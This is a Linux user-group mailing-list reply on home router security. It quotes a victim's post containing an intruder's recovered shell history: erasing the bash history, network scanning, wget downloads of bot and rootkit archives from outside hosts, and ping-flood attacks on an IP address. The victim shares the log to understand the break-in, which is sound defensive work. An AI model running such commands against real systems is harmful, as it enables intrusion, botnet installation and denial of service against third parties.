Wow that is nasty. I have DSL and I use a Linksys router. I hid behind the router using only the ports necessary to achieve my needs. Everyone in the house has access to the internet but only the ports I need are enabled to receive or send data. I've run several port scanners against my system form other locations and have had very good results. PHPTOm wrote: >I think I have found the answer to my problems. I got into a shell using >disc 1 of the installation cds. I switched to super user mode and saw >various commands in the history that were not mine. Someone got in earlier >this week and did some bad things to my system. Below is the history if >anyone is interested in seeing what they were up to. Any explanation of >what they did is welcome. It was pretty much a fresh install, so I wiped >the disc and I am reinstalling. I think I need to learn much more about >security. > >TOm > > > > > > >history >rm -rf .bash_history >ls -al >w >cd /tmp/.cfg/ >cd samba >./scan 217 139 97 1 >./scan 62 139 217 98 >./serv 67.160.4.66 >./scan 67 139 160 4 >./scan 217 139 0 1 >ls -alF >cat /etc/issue >tar >cd /tmp >cd sh >ls -alF >tar -xzvf sh.tgz >exit >id >wget djcc.go.ro/bios.tgz >tar -xzvf bios.tgz >tar -xzvf bios.tgz >ls >rm -rf bios.tgz >ls >ps -aux >cat /proc/cpuinfo >exit >chmod 700 inst >chmod +x inst >exit >mkdir /dev/targa >cd /dev/targa >wget mihai-doini.org/bot.tgz >tar -xzvf bot.tgz >exit >ping -s -f 203.144.243.10 65500& >ping -f -s 203.144.243.10 65500& >ping -s -f 203.144.243.10 65500& >ls >cd / >ping -s -f 203.144.243.10 65500& >history | more >history | vim >history -w /tmp/hist.txt > > > >_______________________________________________ >TCLUG Mailing List - Minneapolis/St. Paul, Minnesota >http://www.mn-linux.org tclug-list at mn-linux.org >https://mailman.real-time.com/mailman/listinfo/tclug-list > > > _______________________________________________ TCLUG Mailing List - Minneapolis/St. Paul, Minnesota http://www.mn-linux.org tclug-list at mn-linux.org https://mailman.real-time.com/mailman/listinfo/tclug-list